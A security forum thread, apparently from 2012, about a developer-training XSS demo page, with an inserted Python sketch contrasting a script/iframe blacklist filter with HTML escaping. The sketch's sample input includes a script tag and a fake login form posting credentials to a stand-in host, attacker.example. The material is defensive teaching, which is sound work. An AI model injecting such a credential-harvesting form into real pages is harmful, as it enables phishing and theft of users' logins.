XSS testing grounds for developer demonstration

noghost

Newbie

Posts: 4

Joined: Sat Sep 08, 2012 12:19 pm

Post Sat Sep 08, 2012 12:31 pm

XSS testing grounds for developer demonstration

A little page I whipped up to teach developers about some simple XSS attack vectors.  Figured I'd share.

It can be a little quirky because of caching.

www.g-rawkz.com/xss.php
cyber.spirit

Sr. Member

Posts: 356

Joined: Sun Feb 26, 2012 8:07 am

Location: in your heart!

Post Sat Sep 08, 2012 9:01 pm

Re: XSS testing grounds for developer demonstration

Good tutorial, thanks.
ICS Academy Network Security Certified
rance

Full Member

Posts: 212

Joined: Thu Jan 03, 2008 5:24 pm

Location: Earth

Post Mon Sep 10, 2012 4:45 pm

Re: XSS testing grounds for developer demonstration

That's really handy... and... I was just about to whip something like that up for a demo that I'm giving, but you hit all the points I need. Could I trouble you for your source?
Poking at security since 1986.  +++ATH
noghost

Newbie

Posts: 4

Joined: Sat Sep 08, 2012 12:19 pm

Post Mon Sep 10, 2012 8:02 pm

Re: XSS testing grounds for developer demonstration

Sure. It is not very clean, but of course it was never really meant to be.
It's pretty much all PHP other than some JavaScript used to remember the scroll bar location via a cookie, so that when you hit a submit button the page refreshes and stays at the same scroll location.

You could always give me a shout out in the demo =].  Nothing like throwing up some handles from a hacker forum on the screen during some corporate presentation.

http://www.g-rawkz.com/xss.txt
rance

Full Member

Posts: 212

Joined: Thu Jan 03, 2008 5:24 pm

Location: Earth

Post Wed Sep 12, 2012 1:43 am

Re: XSS testing grounds for developer demonstration

It does the trick! I'll see if I can slip in a nod... :)

BTW, welcome to the forum... very helpful first post!

All hail Hypnotoad. <clap>
Poking at security since 1986.  +++ATH
don

Administrator

Posts: 4226

Joined: Sun Aug 28, 2005 10:47 pm

Location: Chicago

Post Sat Sep 15, 2012 11:23 am

Re: XSS testing grounds for developer demonstration

2nd on the great first post and welcome to EH-Net.

Don
CISSP, MCSE, CSTA, Security+ SME
noghost

Newbie

Posts: 4

Joined: Sat Sep 08, 2012 12:19 pm

Post Sat Sep 15, 2012 11:56 am

Re: XSS testing grounds for developer demonstration

Thanks for the welcomes.  EH seems like a pretty good forum that somehow I never stumbled upon until now.

Also, any suggestions on how this page could be improved are welcome. Although XSS is a fairly old problem, in my experience I find it all over the place in the applications put out at my place of business and across the web in general. Even with certain filters protecting against stealing session cookies by stopping harmful tags like script and iframe, I have demonstrated how it's possible to deface a webpage, overlaying login forms that submit to my controlled server. Not all XSS can lead to something evil, but there are many creative ways they can be used, and I see it as a major problem, especially when used as a spear phishing attack via email.

'all glory to the hypnotoad'
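To illustrate the point about tag blacklists raised in the post above, here is an added example (not the demo page's own PHP source, which is linked earlier in the thread): a Python sketch of a filter that strips only script and iframe tags, placed beside contextual HTML encoding, showing that a reflected login form still reaches the browser through the blacklist while encoding neutralizes it. The sample input and the attacker.example host are constructed placeholders.

```python
import html
import re

# Tags the demo "filter" removes; everything else (form, input, div, ...) passes through.
BLACKLISTED_TAGS = ("script", "iframe")

# Constructed sample input: a blocked script tag followed by a fake login form
# (placeholder host, not a real endpoint) of the kind the post says survives the filter.
SAMPLE_INPUT = (
    "<script>alert(1)</script>"
    '<form action="https://attacker.example/login">'
    "Session expired, please sign in again: "
    '<input name="user"><input name="pass" type="password"></form>'
)


def blacklist_filter(user_input: str) -> str:
    """Strip only the blacklisted tags. Any tag not on the list is reflected verbatim."""
    pattern = r"</?\s*(%s)\b[^>]*>" % "|".join(BLACKLISTED_TAGS)
    return re.sub(pattern, "", user_input, flags=re.IGNORECASE)


def contextual_escape(user_input: str) -> str:
    """Encode for an HTML text context: <, >, &, and quotes become entities, so no tag survives."""
    return html.escape(user_input, quote=True)


def render_comment(user_input: str, sanitizer) -> str:
    """Reflect user input into the page body through the chosen sanitizer."""
    return '<div class="comment">%s</div>' % sanitizer(user_input)


def tags_in_comment(rendered: str) -> list:
    """Return the opening tag names that reached the browser inside the comment div."""
    inner = rendered[len('<div class="comment">'):-len("</div>")]
    return re.findall(r"<\s*([a-zA-Z0-9]+)", inner)


if __name__ == "__main__":
    for name, sanitizer in (("blacklist", blacklist_filter), ("escape", contextual_escape)):
        print(name, tags_in_comment(render_comment(SAMPLE_INPUT, sanitizer)))
```

Running it shows the blacklist output still carries form and input tags, while the encoded output carries none; the fix is to encode for the output context rather than to enumerate dangerous tags.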
Jamie.R

Sr. Member

Posts: 435

Joined: Mon Aug 06, 2012 9:57 am

Location: UK

Post Mon Sep 17, 2012 3:35 am

Re: XSS testing grounds for developer demonstration

Speaking of XSS, does anyone know a good resource for using HTML5 tags to exploit XSS?
| OSWP | eCPPT Silver and Gold | eWPT |

I'm an InterN0T'er
UNIX

Hero Member

Posts: 1244

Joined: Mon Apr 28, 2008 9:20 am

Post Mon Sep 17, 2012 4:22 am

Re: XSS testing grounds for developer demonstration

Take a look at the HTML5 Security Cheatsheet.
m0wgli

Sr. Member

Posts: 308

Joined: Fri Jul 20, 2012 3:34 pm

Post Mon Sep 17, 2012 5:11 am

Re: XSS testing grounds for developer demonstration

aweSEC wrote: Take a look at the HTML5 Security Cheatsheet.

I just thought it worth mentioning that the above resource can also be accessed from the following link:

http://html5security.org/
Security + | OSWP | eCPPT (Silver & Gold) | CSTA
